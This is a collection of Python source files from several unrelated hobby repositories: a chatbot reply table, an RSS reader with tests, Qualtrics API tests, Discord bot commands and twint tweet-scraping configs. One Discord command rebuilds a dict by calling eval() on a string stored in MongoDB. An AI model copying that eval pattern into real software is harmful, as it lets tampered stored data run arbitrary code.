["shouldnt i ",
"shouldnt i "],
"!shouldnt_i_n!")
shouldnt_u_p = yesnoset(['i should', 'i think i should'] +
positives, ["shouldnt you ", "shouldnt you "], "!shouldnt_u_p!")
shouldnt_u_n = yesnoset(["i shouldnt",
"i dont think i should",
"i should not"] + negatives,
["shouldnt you ",
"shouldnt you "],
"!shouldnt_u_n!")
was_i_p = yesnoset(['yes, you were',
'you were',
'i think you were'] + positives,
["was i "],
"!was_i_p!")
was_i_n = yesnoset(["nah, you werent",
"you werent",
"i dont think you were"] + negatives,
["was i "],
"!was_i_n!")
were_u_p = yesnoset(['i was', 'yeah, i was'] +
positives, ["were you "], "!were_u_p!")
were_u_n = yesnoset(["i wasnt", "nah, i wasnt"] +
negatives, ["were you "], "!were_u_n!")
are_u_p = yesnoset(['i am', 'yeah, i am', 'i think i am'] +
positives, ["are you "], "!are_u_p!")
are_u_n = yesnoset(['i am not',
"nah, im not",
"i dont think i am"] + negatives,
["are you "],
"!are_u_n!")
arent_u_p = yesnoset(['i am', 'i think i am'] + positives,
["arent you ", "arent you "], "!arent_u_p!")
arent_u_n = yesnoset(['i am not', "i dont think i am"] +
negatives, ["arent you ", "arent you "], "!arent_u_n!")
cant_u_p = yesnoset(['i can', 'i think i can'] + positives,
['cant you ', "cant you "], '!cant_u_p!')
cant_u_n = yesnoset(['i can not', 'i dont think i can'] +
                    negatives, ['cant you ', "cant you "], '!cant_u_n!')
cant_i_p = yesnoset(['you can!', 'i think you can'] +
positives, ['cant i ', "cant i "], '!cant_i_p!')
cant_i_n = yesnoset(['you can not!',
"no, you cant",
"i dont think you can"] + negatives,
['cant i ',
"cant i "],
'!cant_i_n!')
i_will_n = yesnoset(['i wont', 'i wont'], ['i will '], '!i_will_n!')
i_will_p = yesnoset(['same', 'so will i'], ['i will '], '!i_will_p!')
i_will_q = yesnoset(['are you sure', 'why though'], ['i will '], '!i_will_q!')
i_wont_n = yesnoset(['same', 'nor will i'], [
'i wont ', "i wont"], '!i_wont_n!')
i_wont_p = yesnoset(['really, i will', 'i will'], [
'i wont ', "i wont"], '!i_wont_p!')
i_wont_q = yesnoset(['are you sure', 'why not'], [
    'i wont ', "i wont"], '!i_wont_q!')
i_dont_n = yesnoset(['same', 'nor do i'], ['i dont ', "i dont"], '!i_dont_n!')
i_dont_p = yesnoset(['really, i do', 'i do'], [
'i dont ', "i dont"], '!i_dont_p!')
i_dont_q = yesnoset(['are you sure', 'why not'], [
'i dont ', "i dont"], '!i_dont_q!')
i_would_n = yesnoset(["i wouldnt", 'really, i would not'], [
'i would '], '!i_would_n!')
i_would_p = yesnoset(['same', 'so would i'], ['i would '], '!i_would_p!')
i_would_q = yesnoset(['are you sure', 'why though'],
['i would '], '!i_would_q!')
i_wouldnt_p = yesnoset(["i would", 'really, i would'], [
'i wouldnt ', "i wouldnt"], '!i_would_n!')
i_wouldnt_n = yesnoset(['same', 'nor would i'], [
'i wouldnt ', "i wouldnt"], '!i_would_p!')
i_wouldnt_q = yesnoset(['are you sure', 'why not'], [
'i wouldnt ', "i wouldnt"], '!i_would_q!')
i_could_n = yesnoset(["i couldnt", 'really, i could not'], [
'i could '], '!i_could_n!')
i_could_p = yesnoset(['same', 'so could i'], ['i could '], '!i_could_p!')
i_could_q = yesnoset(['are you sure', 'why though'],
['i could '], '!i_could_q!')
i_couldnt_p = yesnoset(["i could", 'really, i could'], [
'i couldnt ', "i couldnt"], '!i_could_n!')
i_couldnt_n = yesnoset(['same', 'nor could i'], [
'i couldnt ', "i couldnt"], '!i_could_p!')
i_couldnt_q = yesnoset(['are you sure', 'why not'], [
'i couldnt ', "i couldnt"], '!i_could_q!')
i_should_n = yesnoset(["i shouldnt", 'really, i should not'], [
'i should '], '!i_should_n!')
i_should_p = yesnoset(['same', 'so should i'], ['i should '], '!i_should_p!')
i_should_q = yesnoset(['are you sure', 'why though'],
['i should '], '!i_should_q!')
i_shouldnt_p = yesnoset(["i should", 'really, i should'], [
'i shouldnt ', "i shouldnt"], '!i_should_n!')
i_shouldnt_n = yesnoset(['same', 'nor should i'], [
'i shouldnt ', "i shouldnt"], '!i_should_p!')
i_shouldnt_q = yesnoset(['are you sure', 'why not'], [
'i shouldnt ', "i shouldnt"], '!i_should_q!')
# New
i_think_p = yesnoset(['i agree', 'same', 'i think so too', 'agreed'], [
"i think "], '!i_think_p!')
i_think_n = yesnoset(['i disagree', "i dont think so", "i dont", 'disagree'], [
"i think "], '!i_think_n!')
i_think_q = yesnoset(['why do you think that', "why"],
["i think "], '!i_think_q!')
# Noun
dont_noun_p = yesnoset(['they do', 'i think they do'] +
positives, ["dont ,dont "], "!dont_noun_p!", True)
dont_noun_n = yesnoset(["they dont", "i dont think they do"] +
negatives, ["dont ", "dont "], "!dont_noun_n!", True)
arent_noun_p = yesnoset(['they are', 'i think they are'] +
positives, ["arent ", "arent "], "!arent_noun_p!", True)
arent_noun_n = yesnoset(['they are not', "i dont think they are"] +
negatives, ["arent ", "arent "], "!arent_noun_n!", True)
are_noun_p = yesnoset(['they are',
'i think they are',
'yes, they are'] + positives,
["are "],
"!are_noun_p!",
True)
are_noun_n = yesnoset(['they are not',
"i dont think they are",
"nah, they're not"] + negatives,
["are "],
"!are_noun_n!",
True)
do_noun_p = yesnoset(['they do',
'i think they do',
'yeah, they do'] + positives,
['do '],
"!do_noun_p!",
True)
do_noun_n = yesnoset(["they dont",
'they do not',
"i dont think they do"] + negatives,
['do '],
"!do_noun_n!",
True)
is_noun_p = yesnoset(['it is', 'yes, it is', 'yeah, it is'] +
positives, ['is '], "!is_noun_p!", True)
is_noun_n = yesnoset(["it isnt",
'no, it is not',
"nah, it isnt"] + negatives,
['is '],
"!is_noun_n!",
True)
isnt_noun_p = yesnoset(['it is', 'yes, it is', 'yeah, it is'], [
'isnt ', "isnt"], "!isnt_noun_p!", True)
isnt_noun_n = yesnoset(["it isnt", 'no, it is not', "nah, it isnt"], [
'isnt ', "isnt"], "!isnt_noun_n!", True)
can_noun_p = yesnoset(['they can', 'yes, they can'] +
positives, ['can '], '!can_noun_p!', True)
# Replace it with they if plural and vice versa, if savenoun=True
can_noun_n = yesnoset(['they cannot', "no, they cant"] +
negatives, ['can '], '!can_noun_n!', True)
cant_noun_p = yesnoset(['they can', 'yes, they can'], [
'cant ', "cant "], '!cant_noun_p!', True)
cant_noun_n = yesnoset(['they cannot', "no, they cant"], [
'cant ', "cant "], '!cant_noun_n!', True)
was_noun_p = yesnoset(['yes, it was',
'it was',
'i think it was'] + positives,
["was "],
"!was_noun_p!",
True)
was_noun_n = yesnoset(["no, it wasnt",
"it wasnt",
"i dont think it was"] + negatives,
["was "],
"!was_noun_n!",
True)
wasnt_noun_p = yesnoset(['yes, it was', 'it was', 'i think it was'], [
"wasnt ", "wasnt"], "!wasnt_noun_p!", True)
wasnt_noun_n = yesnoset(["no, it wasnt", "it wasnt", "i dont think it was"], [
"wasnt ", "wasnt"], "!wasnt_noun_n!", True)
will_noun_p = yesnoset(['yes it will',
'it will',
'i think it will'] + positives,
['will '],
"!will_noun_p!",
True)
will_noun_n = yesnoset(['no it will not',
"it wont",
"i dont think it will"] + negatives,
['will '],
"!will_noun_n!",
True)
wont_noun_p = yesnoset(['yes it will', 'it will', 'i think it will'], [
"wont ", "wont "], "!wont_noun_p!", True)
wont_noun_n = yesnoset(['no it will not', "it wont", "i dont think it will"], [
"wont ", "wont "], "!wont_noun_n!", True)
would_noun_p = yesnoset(['they would',
'i think they would',
'yeah, they would'] + positives,
["would "],
"!would_noun_p!",
True)
would_noun_n = yesnoset(["they wouldnt",
"i dont think they would",
"nah, they wouldnt"] + negatives,
["would "],
"!would_noun_n!",
True)
wouldnt_noun_p = yesnoset(['they would', 'i think they would', 'yeah, they would'], [
"wouldnt ", "wouldnt "], "!wouldnt_noun_p!", True)
wouldnt_noun_n = yesnoset(["they wouldnt",
"i dont think they would",
"nah, they wouldnt"],
["wouldnt ",
"wouldnt "],
"!wouldnt_noun_n!",
True)
could_noun_p = yesnoset(['they could',
'i think they could',
'yeah, they could'] + positives,
["could "],
"!could_noun_p!",
True)
could_noun_n = yesnoset(["they couldnt",
"i dont think they could",
"nah, they couldnt"] + negatives,
["could "],
"!could_noun_n!",
True)
couldnt_noun_p = yesnoset(['they could', 'i think they could', 'yeah, they could'], [
"couldnt ", "couldnt "], "!couldnt_noun_p!", True)
couldnt_noun_n = yesnoset(["they couldnt",
"i dont think they could",
"nah, they couldnt"],
["couldnt ",
"couldnt "],
"!couldnt_noun_n!",
True)
should_noun_p = yesnoset(['they should',
'i think they should',
'yeah, they should'] + positives,
["should "],
"!should_noun_p!",
True)
should_noun_n = yesnoset(["they shouldnt",
"i dont think they should",
"nah, they shouldnt"] + negatives,
["should "],
"!should_noun_n!",
True)
shouldnt_noun_p = yesnoset(['they should', 'i think they should', 'yeah, they should'], [
"shouldnt ", "shouldnt "], "!shouldnt_noun_p!", True)
shouldnt_noun_n = yesnoset(["they shouldnt",
"i dont think they should",
"nah, they shouldnt"],
["shouldnt ",
"shouldnt "],
"!shouldnt_noun_n!",
True)
were_noun_p = yesnoset(['they were',
'i think they were',
'yeah, they were'] + positives,
["were "],
"!were_noun_p!",
True)
were_noun_n = yesnoset(["they werent",
"i dont think they were",
"nah, they werent"] + negatives,
["were "],
"!were_noun_n!",
True)
werent_noun_p = yesnoset(['they were', 'i think they were', 'yeah, they were'], [
"werent ", "werent "], "!werent_noun_p!", True)
werent_noun_n = yesnoset(["they werent", "i dont think they were", "nah, they werent"], [
"werent ", "werent "], "!werent_noun_n!", True)
# Me
with open('Me.txt', 'r') as me:
things_i_am = me.read().split('\n')
all_resp = [
do_you_p,
do_you_n,
do_i_p,
dont_i_p,
dont_i_n,
dont_u_p,
dont_u_n,
do_i_n,
can_i_p,
can_i_n,
can_u_p,
can_u_n,
will_i_p,
will_i_n,
will_u_p,
will_u_n,
wont_i_p,
wont_i_n,
wont_u_p,
wont_u_n,
would_i_p,
would_i_n,
would_u_p,
would_u_n,
wouldnt_i_p,
wouldnt_i_n,
wouldnt_u_p,
wouldnt_u_n,
could_i_p,
could_i_n,
could_u_p,
could_u_n,
couldnt_i_p,
couldnt_i_n,
couldnt_u_p,
couldnt_u_n,
should_i_p,
should_i_n,
should_u_p,
should_u_n,
shouldnt_i_p,
shouldnt_i_n,
shouldnt_u_p,
shouldnt_u_n,
was_i_p,
was_i_n,
were_u_p,
were_u_n,
are_u_p,
are_u_n,
arent_u_p,
arent_u_n,
cant_u_p,
cant_u_n,
cant_i_p,
cant_i_n,
dont_noun_p,
dont_noun_n,
arent_noun_p,
arent_noun_n,
are_noun_p,
are_noun_n,
do_noun_p,
do_noun_n,
is_noun_p,
is_noun_n,
isnt_noun_p,
isnt_noun_n,
can_noun_p,
can_noun_n,
cant_noun_p,
cant_noun_n,
was_noun_p,
was_noun_n,
wasnt_noun_p,
wasnt_noun_n,
will_noun_p,
will_noun_n,
wont_noun_p,
wont_noun_n,
would_noun_p,
would_noun_n,
wouldnt_noun_p,
wouldnt_noun_n,
could_noun_p,
could_noun_n,
couldnt_noun_p,
couldnt_noun_n,
should_noun_p,
should_noun_n,
shouldnt_noun_p,
shouldnt_noun_n,
were_noun_p,
were_noun_n,
werent_noun_p,
werent_noun_n,
i_will_n,
i_will_p,
i_will_q,
i_wont_n,
i_wont_p,
i_wont_q,
i_dont_n,
i_dont_p,
i_dont_q,
i_would_n,
i_would_p,
i_would_q,
i_wouldnt_p,
i_wouldnt_n,
i_wouldnt_q,
i_could_n,
i_could_p,
i_could_q,
i_couldnt_p,
i_couldnt_n,
i_couldnt_q,
i_should_n,
i_should_p,
i_should_q,
i_shouldnt_p,
i_shouldnt_n,
i_shouldnt_q,
i_think_p,
i_think_n,
i_think_q]
``` |
{
"source": "3nterz/rss-feed-reader",
"score": 3
} |
#### File: 3nterz/rss-feed-reader/app.py
```python
from sys import stdout
from typing import Optional, Sequence, TextIO
from model import RSSFeedChannel
from cli import CLIParser
from cli import CLIWriter
from rssfeedloader import RSSFeedLoader
from rssfeedreader import RSSFeedReader
from feedloaders import FeedParserRSSFeedLoader
def get_default_feedloader(rss_feed_url: str) -> RSSFeedLoader:
"""Factory method for default RSSFeedLoader implementation"""
return FeedParserRSSFeedLoader(rss_feed_url)
def get_default_feedreader(file: TextIO) -> RSSFeedReader:
"""Factory method for default RSSFeedReader implementation"""
return CLIWriter(file=file)
def main(output_stream: TextIO=stdout, args: Optional[Sequence[str]]=None) -> None:
"""Application entry point for RSS Feed Reader"""
cli_parser: CLIParser = CLIParser(file=output_stream)
cli_writer: RSSFeedReader = get_default_feedreader(file=output_stream)
cli_parser.parse_rss_feed_urls_from_args(args)
rss_feed_url_list: list[str] = [str(url) for url in cli_parser.get_list_of_rss_feed_urls()]
# in the background, process all feed urls
feedloader_list: list[RSSFeedLoader] = []
rss_feed_url: str
for rss_feed_url in rss_feed_url_list:
feedloader: RSSFeedLoader = get_default_feedloader(rss_feed_url)
feedloader.load_rss_feed()
feedloader_list.append(feedloader)
# display all output together
feedloader: RSSFeedLoader
for feedloader in feedloader_list:
rss_feed_channel: RSSFeedChannel = feedloader.get_rss_feed_channel()
cli_writer.show_rss_feed_content(rss_feed_channel)
if __name__ == '__main__':
main()
```
#### File: 3nterz/rss-feed-reader/feedloaders_test.py
```python
from typing import Any, Callable
import unittest
from model import RSSFeedChannel, RSSFeedItem
from feedloaders import _convert_html_content_to_text, _strip_whitespace
from feedloaders import FeedParserRSSFeedLoader
class TestRSSFeedParsers(unittest.TestCase):
"""Tests for module feedloaders members including class FeedParserRSSFeedLoader
"""
def test_convert_html_content_to_text(self) -> None:
"""Verify html entities in HTML content are removed when converted to plain text
"""
test_data: str = '<p>Paragraph</p>'
actual_result: str = _convert_html_content_to_text(test_data) #pylint: disable=protected-access
expected_result: str = 'Paragraph'
self.assertEqual(actual_result, expected_result)
def test_strip_whitespace(self) -> None:
"""Verify leading and trailing whitespace are removed when invoking method
"""
test_data: str = ' 123 '
actual_result: str = _strip_whitespace(test_data) #pylint: disable=protected-access
expected_result: str = '123'
self.assertEqual(actual_result, expected_result)
def test_parse_rss_feed_by_url(self) -> None:
"""Verify calling _parse_rss_feed_by_url with empty string does not return None
"""
feedparser: FeedParserRSSFeedLoader = FeedParserRSSFeedLoader('')
actual_instance_object: dict[str, Any] = feedparser._parse_rss_feed_by_url('') #pylint: disable=protected-access
self.assertIsNotNone(actual_instance_object)
def template_test_check_dict_result(self,
method: Callable[[dict[str, Any]], dict[str, Any]],
test_data: dict[str, Any], expected_result: str) -> None:
"""Template method to invoke a common set of code statements across
multiple test methods.
"""
actual_result: dict[str, Any] = method(test_data)
self.assertEqual(actual_result, expected_result)
def test_get_parsed_rss_feed_channel(self) -> None:
"""Verify specifying test data with key 'feed' correctly resolves the value
"""
feedparser: FeedParserRSSFeedLoader = FeedParserRSSFeedLoader('')
self.template_test_check_dict_result(
feedparser._get_parsed_rss_feed_channel, #pylint: disable=protected-access
test_data={'feed':'result'},
expected_result='result'
)
def test_get_parsed_rss_feed_item_list(self) -> None:
"""Verify specifying test data with key 'entries' correctly resolves the value
"""
feedparser: FeedParserRSSFeedLoader = FeedParserRSSFeedLoader('')
self.template_test_check_dict_result(
feedparser._get_parsed_rss_feed_item_list, #pylint: disable=protected-access
test_data={'entries':'result'},
expected_result='result'
)
def test_convert_parsed_rss_feed_item_to_rss_feed_item(self) -> None:
"""Verify dict is successfully converted to RSSFeedItem
"""
feedparser: FeedParserRSSFeedLoader = FeedParserRSSFeedLoader('')
test_data: dict[str, Any] = dict(
title='Some title',
description='Some description here.',
link='http://somelink.lnk'
)
actual_result: RSSFeedItem = feedparser._convert_parsed_rss_feed_item_to_rss_feed_item( #pylint: disable=W0212
test_data)
expected_result: RSSFeedItem = RSSFeedItem(
title='Some title',
description='Some description here.',
link='http://somelink.lnk'
)
self.assertEqual(actual_result, expected_result)
def test_convert_parsed_rss_feed_to_rss_feed_channel(self) -> None:
"""Verify dict is successfully converted to RSSFeedChannel
"""
feedparser: FeedParserRSSFeedLoader = FeedParserRSSFeedLoader('')
test_data: dict[str, Any] = {
'feed': {
'title': 'Some feed title',
'description': 'Some feed description here.',
'link': 'http://somefeedlink.lnk'
},
'entries': [{
'title': 'Some item title',
'description': 'Some item description here.',
'link': 'http://someitemlink.lnk'
},]
}
actual_result: RSSFeedChannel = feedparser._convert_parsed_rss_feed_to_rss_feed_channel( #pylint: disable=W0212
test_data)
expected_result_item: RSSFeedItem = RSSFeedItem(
title='Some item title',
description='Some item description here.',
link='http://someitemlink.lnk'
)
expected_result_items: list[RSSFeedItem] = list[RSSFeedItem]()
expected_result_items.append(expected_result_item)
expected_result: RSSFeedChannel = RSSFeedChannel(
title='Some feed title',
description='Some feed description here.',
link='http://somefeedlink.lnk',
items=expected_result_items
)
self.assertEqual(actual_result, expected_result)
``` |
{
"source": "3nth/qualpy",
"score": 3
} |
#### File: qualpy/tests/core_tests.py
```python
import json
import os
from os import path
import pprint
from nose.tools import *
from qualpy.core import Qualtrics
class test_qualtrics(object):
def __init__(self):
self.q = None
self.pp = pprint.PrettyPrinter()
def setup(self):
self.q = Qualtrics()
if not path.exists('tests_out'):
os.makedirs('tests_out')
def teardown(self):
pass
def test_get_surveys(self):
surveys = self.q.get_surveys()
with open('tests_out/surveys.py', 'wt') as f:
f.write(self.pp.pformat(surveys))
def test_get_survey(self):
survey_id = self.q.get_surveys()[0]['SurveyID']
survey = self.q.get_survey(survey_id)
with open('tests_out/survey.xml', 'wt') as f:
f.write(str(survey))
def test_get_panels(self):
panels = self.q.get_panels()
with open('tests_out/panels.json', 'wt') as f:
f.write(str(panels))
def test_get_panel(self):
panels = self.q.get_panels()
for panel in panels:
p = self.q.get_panel_data(panel['PanelID'])
with open('tests_out/panel_{0}.json'.format(panel['PanelID']), 'wt') as f:
f.write(str(p))
def test_get_recipient(self):
panel = self.q.get_panels()[0]
id = self.q.get_panel_data(panel['PanelID'])[1][0]
recipient = self.q.get_recipient(id)
with open('tests_out/recipient.json', 'wt') as f:
f.write(str(recipient))
def test_create_distribution(self):
panels = self.q.create_distribution('', '')
with open('tests_out/create_distribution.json', 'wt') as f:
f.write(str(panels))
``` |
{
"source": "3nws/beako-bot",
"score": 2
} |
#### File: 3nws/beako-bot/ChannelList.py
```python
from commands.db.r_db import commands_add_channel, commands_remove_channel
class ChannelList:
def __init__(self, series, channel_id):
self.series = series
self.channel_id = channel_id
async def add_channel(self, bot, i):
res = await commands_add_channel(bot, i, self.channel_id, self.series)
return res
async def remove_channel(self, bot, i):
res = await commands_remove_channel(bot, i, self.channel_id, self.series)
return res
```
#### File: beako-bot/cogs/WarframeMarket.py
```python
import discord
import random
import os
import aiohttp
import json
from discord.ext import commands
from discord import app_commands
from typing import List
class WarframeMarket(commands.Cog):
def __init__(self, bot: commands.Bot):
self.bot = bot
self.base_url = "https://api.warframe.market/v1"
self.items_list = {}
self.is_synced = False
self.image_url = "https://warframe.market/static/assets"
async def sync(self):
async with aiohttp.ClientSession() as session:
async with session.get(self.base_url+"/items") as r:
if r.status == 200:
response = await r.read()
self.items_list = json.loads(response)['payload']['items']
self.is_synced = True
else:
print("WarframeMarket down!")
@commands.command()
@commands.is_owner()
async def sync_items(self, ctx):
try:
await self.sync()
await ctx.send("Items synced, I suppose!")
except Exception as e:
print(e)
await ctx.send("Something went wrong, I suppose!")
async def item_autocomplete(self,
interaction: discord.Interaction,
current: str,
) -> List[app_commands.Choice[str]]:
if not self.is_synced:
await self.sync()
return [
app_commands.Choice(name=item['item_name'], value=item['item_name'])
for item in self.items_list if current.lower() in item['item_name'].lower()
][:25]
@app_commands.command(name="item")
@app_commands.choices(choices=[
app_commands.Choice(name="I want to buy", value="sell"),
app_commands.Choice(name="I want to sell", value="buy"),
])
@app_commands.autocomplete(item_name=item_autocomplete)
async def get_item(self, interaction: discord.Interaction, choices: app_commands.Choice[str], item_name: str):
order_type = choices.value
item_name = " ".join([p.capitalize() for p in item_name.split(' ')])
if not self.is_synced:
await self.sync()
item_info = None
for item in self.items_list:
if item['item_name'] == item_name:
item_info = item
if item_info is not None:
url_name = item_info['url_name']
async with aiohttp.ClientSession() as session:
async with session.get(self.base_url+"/items/"+url_name) as r:
if r.status == 200:
response = await r.read()
item_detail = json.loads(response)['payload']['item']['items_in_set'][0]
else:
print("WarframeMarket down!")
# bail out early; item_detail would otherwise be used unbound below
return await interaction.response.send_message("WarframeMarket seems to be down, in fact!")
trading_tax = item_detail['trading_tax'] if 'trading_tax' in item_detail.keys() else "No trading tax value"
ducats = item_detail['ducats'] if 'ducats' in item_detail.keys() else "No ducats value"
mastery_level = item_detail['mastery_level'] if 'mastery_level' in item_detail.keys() else "No mastery level"
item_description = item_detail['en']['description']
wikilink = item_detail['en']['wiki_link']
drop_list = item_detail['en']['drop']
desc = f"Requires mastery rank {mastery_level}\n"
desc += f"Trading tax: {trading_tax}, Ducats value: {ducats}\n"
desc += f"```{item_description}```\n"
desc += f"Drops from " if len(drop_list)>0 else ""
for i in range(len(drop_list)):
desc += drop_list[i]['name']+', ' if i < len(drop_list)-1 else drop_list[i]['name']
async with aiohttp.ClientSession() as session:
async with session.get(self.base_url+"/items/"+url_name+"/orders") as r:
if r.status == 200:
response = await r.read()
orders = json.loads(response)['payload']['orders']
online_orders = [o for o in orders if o['user']['status'] != 'offline']
filtered_types = [o for o in online_orders if o['order_type'] == order_type]
orders_sorted = sorted(filtered_types, key = lambda ele: ele['platinum']) if order_type != 'buy' else sorted(filtered_types, key = lambda ele: ele['platinum'], reverse=True)
else:
print("WarframeMarket down!")
# bail out early; orders would otherwise be used unbound below
return await interaction.response.send_message("WarframeMarket seems to be down, in fact!")
for i in range(len(orders_sorted)):
if i>4:
break
desc += f"\n\nPrice: {orders_sorted[i]['platinum']} plat, Quantity: {orders_sorted[i]['quantity']}, Order type: {orders_sorted[i]['order_type']}\n"
desc += f"by {orders_sorted[i]['user']['ingame_name']}\n"
desc += f"```/w {orders_sorted[i]['user']['ingame_name']} Hi! I want to {orders_sorted[i]['order_type']}: {item_name} for {orders_sorted[i]['platinum']} platinum. (warframe.market)```\n"
embed = discord.Embed(
color=discord.Colour.random(),
title=item_info['item_name'],
url=wikilink,
description=desc,
)
embed.set_thumbnail(url=self.image_url+"/"+item_info['thumb'])
await interaction.response.send_message(embed=embed)
else:
await interaction.response.send_message("I couldn't find that item, in fact!")
async def setup(bot: commands.Bot):
await bot.add_cog(WarframeMarket(bot))
```
#### File: commands/db/r_remove_channel.py
```python
import pymongo
import os
import asyncio
from dotenv import load_dotenv
from commands.db.classes.MangaDex import MangaDex
from pymongo.errors import ConnectionFailure
load_dotenv()
client = pymongo.MongoClient('localhost', 27017)
try:
client.admin.command('ping')
except ConnectionFailure:
print("Local not available")
client = pymongo.MongoClient(os.getenv("DB_URL"))
# chapter db
db_chapter = client.chapter
# channels data
channels_md = db_chapter.data_mangadex
async def commands_remove_channel(bot, i, series_obj):
md = MangaDex()
msg = await series_obj.remove_channel(bot, i)
if isinstance(msg, list):
emojis = msg[3]
manga_ids = msg[1]
titles = msg[2]
msg = msg[0]
msg = await i.channel.send(embed=msg)
await i.response.send_message("Pick a series to unfollow, in fact!")
else:
return await i.response.send_message(msg)
for j in range(len(manga_ids)):
await msg.add_reaction(emojis[j])
def check(reaction, user):
return user == i.user and reaction.message == msg
while True:
try:
reaction, user = await bot.wait_for('reaction_add', check=check, timeout=60.0)
mangas_on_channel = (channels_md.find_one(
{"channel_id": str(i.channel_id)}))['mangas']
mangas_dict = eval(mangas_on_channel)
idx = 0
for j, emoji in enumerate(emojis):
if emoji == str(reaction):
idx = j
break
if str(reaction) == emojis[idx]:
if manga_ids[idx] in mangas_dict:
mangas_dict.pop(manga_ids[idx])
new_doc = channels_md.find_one_and_update(
{'channel_id': str(i.channel_id)},
{
'$set': {
'mangas': str(mangas_dict)
}
},
return_document=pymongo.ReturnDocument.AFTER
)
title = titles[idx]
await i.channel.send(f"This channel will no longer receive notifications on new chapters of {title}, I suppose!")
except asyncio.TimeoutError:
await msg.clear_reactions()
await msg.reply("I'm not accepting any unfollow requests anymore, in fact!")
break
``` |
{
"source": "3nws/re-zero-translation-notifier-bot",
"score": 3
} |
#### File: re-zero-translation-notifier-bot/commands/r_avatar.py
```python
import discord
async def commands_avatar(ctx, member):
avatar_frame = discord.Embed(
color = discord.Colour.random()
)
if member:
avatar_frame.add_field(name=str(ctx.author)+" requested", value=member.mention+"'s avatar, I suppose!")
avatar_frame.set_image(url=f'{member.avatar_url}')
else:
avatar_frame.add_field(name=str(ctx.author)+" requested", value=" their own avatar, I suppose!")
avatar_frame.set_image(url=f'{ctx.author.avatar_url}')
await ctx.send(embed=avatar_frame)
```
#### File: re-zero-translation-notifier-bot/commands/r_coinflip.py
```python
import random
import discord
from random import choice
determine_flip = [1, 0]
async def commands_coinflip(ctx, heads, tails):
if heads is not None and tails is None:
embed = discord.Embed(title="Error", description=f"{ctx.author.mention} tried to flip a coin but didn't specify what for is tails, I suppose!")
await ctx.send(embed=embed)
elif heads is None or tails is None:
if random.choice(determine_flip) == 1:
embed = discord.Embed(title="Coinflip", description=f"{ctx.author.mention} flipped a coin, and got **Heads**, I suppose!")
await ctx.send(embed=embed)
else:
embed = discord.Embed(title="Coinflip", description=f"{ctx.author.mention} flipped a coin, and got **Tails**, I suppose!")
await ctx.send(embed=embed)
else:
if random.choice(determine_flip) == 1:
embed = discord.Embed(title="Coinflip", description=f"{ctx.author.mention} flipped a coin, and got **Heads** for **{heads}**, I suppose!")
await ctx.send(embed=embed)
else:
embed = discord.Embed(title="Coinflip", description=f"{ctx.author.mention} flipped a coin, and got **Tails** for **{tails}**, I suppose!")
await ctx.send(embed=embed)
```
#### File: re-zero-translation-notifier-bot/commands/r_roll.py
```python
import random
async def commands_roll(ctx, num):
if num.isnumeric():
number = random.randint(1, int(num))
else:
number = random.randint(1, 100)
await ctx.send(f"{ctx.message.author.name} just rolled **{number}**, I suppose!")
```
#### File: re-zero-translation-notifier-bot/commands/r_series.py
```python
import discord
async def commands_series(ctx):
series = [
"Kaguya-sama: Love is War (kaguya)",
"Oshi no Ko (onk)",
"Re:Zero (rz)"
]
frame = discord.Embed(
color = discord.Colour.random()
)
counter = 1
desc = ""
for s in series:
desc += f"**{counter}.** {s}\n"
counter += 1
frame.description = desc
await ctx.send(embed=frame)
``` |
{
"source": "3nws/twint",
"score": 3
} |
#### File: 3nws/twint/main.py
```python
import twint
import joblib
from datetime import datetime
def get_real_time():
now = datetime.utcnow()
year = now.year
month = now.month
day = now.day
hour = now.hour
if hour < 10:
hour = "0"+str(hour)
minute = now.minute
if minute < 10:
minute = "0"+str(minute)
second = now.second
if second < 10:
second = "0"+str(second)
date_format = str(year)+"-"+str(month)+"-"+str(day)+" " + \
str(hour)+":"+str(minute)+":"+str(second)
return date_format
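# e.g. "2022-3-1 09:05:07" - month and day are left unpadded, matching the manual c.Since strings below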
# Configure
c = twint.Config()
# c.Database = "covid.db"
# c.Search = "ukraine OR russia OR russian invasion OR ukraine war OR russian war OR zelensky OR putin OR vladimir putin OR volodymyr zelensky OR ukraine russia OR defence of ukraine"
c.Search = "Украина"
# c.Search = "corona"
# c.Search = "Sputnik OR gamaleya vaccine OR Sputnik V"
# c.Search = "Sinopharm OR Sinopharm OR Sinopharm vaccine OR Sinopharm BIBP"
# c.Search = "moderna OR spikevax"
# c.Search = "Janssen OR Johnson & Johnson vaccine"
# c.Search = "Pfizer–BioNTech OR biontech OR pfizer OR Pfizer BioNTech"
# c.Search = "Oxford–AstraZeneca OR astrazeneca OR oxford vaccine OR Vaxzevria OR Covishield"
# c.Since = get_real_time()
c.Since = "2022-2-24"
# c.Since = "2020-2-24"
# c.Until = get_real_time()
# c.Lang = "en"
c.Lang = "ru"
c.Translate = True
c.TranslateDest = "en"
# c.Limit = 50
c.Count = True
c.Store_csv = True
c.Store_object = True
c.Output = "war-russian.csv"
# Run
twint.run.Search(c)
# tweets = twint.output.tweets_list
# # joblib.dump(tweets, './tweets.pkl')
# for i in range(len(tweets)):
# c = twint.Config()
# c.User_id = tweets[i].user_id
# print(605203235)
# c.Store_object = True
# c.User_full = True
# twint.run.Lookup(c)
# user_location = twint.output.users_list[0].location if 'location' in twint.output.users_list[0].__dict__.keys() else "-"
```
#### File: twint/twint/format.py
```python
import logging as logme
def Tweet(config, t):
if config.Format:
logme.debug(__name__+':Tweet:Format')
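# e.g. (illustrative) config.Format = "{username}: {tweet}" produces output
# like "someuser: some tweet text" after the replacements below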
# output = config.Format.replace("{id}", str(t.id_str))
# output = output.replace("{conversation_id}", str(t.conversation_id))
# output = output.replace("{date}", str(t.datestamp))
# output = output.replace("{time}", str(t.timestamp))
# the remaining replacements were commented out above, so start from config.Format here
output = config.Format.replace("{user_id}", str(t.user_id_str))
output = output.replace("{username}", t.username)
# output = output.replace("{name}", str(t.name))
# output = output.replace("{place}", t.place)
# output = output.replace("{timezone}", str(t.timezone))
# output = output.replace("{urls}", ",".join(str(t.urls)))
# output = output.replace("{photos}", ",".join(str(t.photos)))
# output = output.replace("{video}", str(t.video))
# output = output.replace("{thumbnail}", str(t.thumbnail))
output = output.replace("{tweet}", t.tweet)
output = output.replace("{language}", str(t.lang))
# output = output.replace("{hashtags}", ",".join(str(t.hashtags)))
# output = output.replace("{cashtags}", ",".join(str(t.cashtags)))
# output = output.replace("{replies}", str(t.replies_count))
# output = output.replace("{retweets}", str(t.retweets_count))
# output = output.replace("{likes}", str(t.likes_count))
# output = output.replace("{link}", str(t.link))
# output = output.replace("{is_retweet}", str(t.retweet))
# output = output.replace("{user_rt_id}", str(t.user_rt_id))
# output = output.replace("{quote_url}", str(t.quote_url))
# output = output.replace("{near}", t.near)
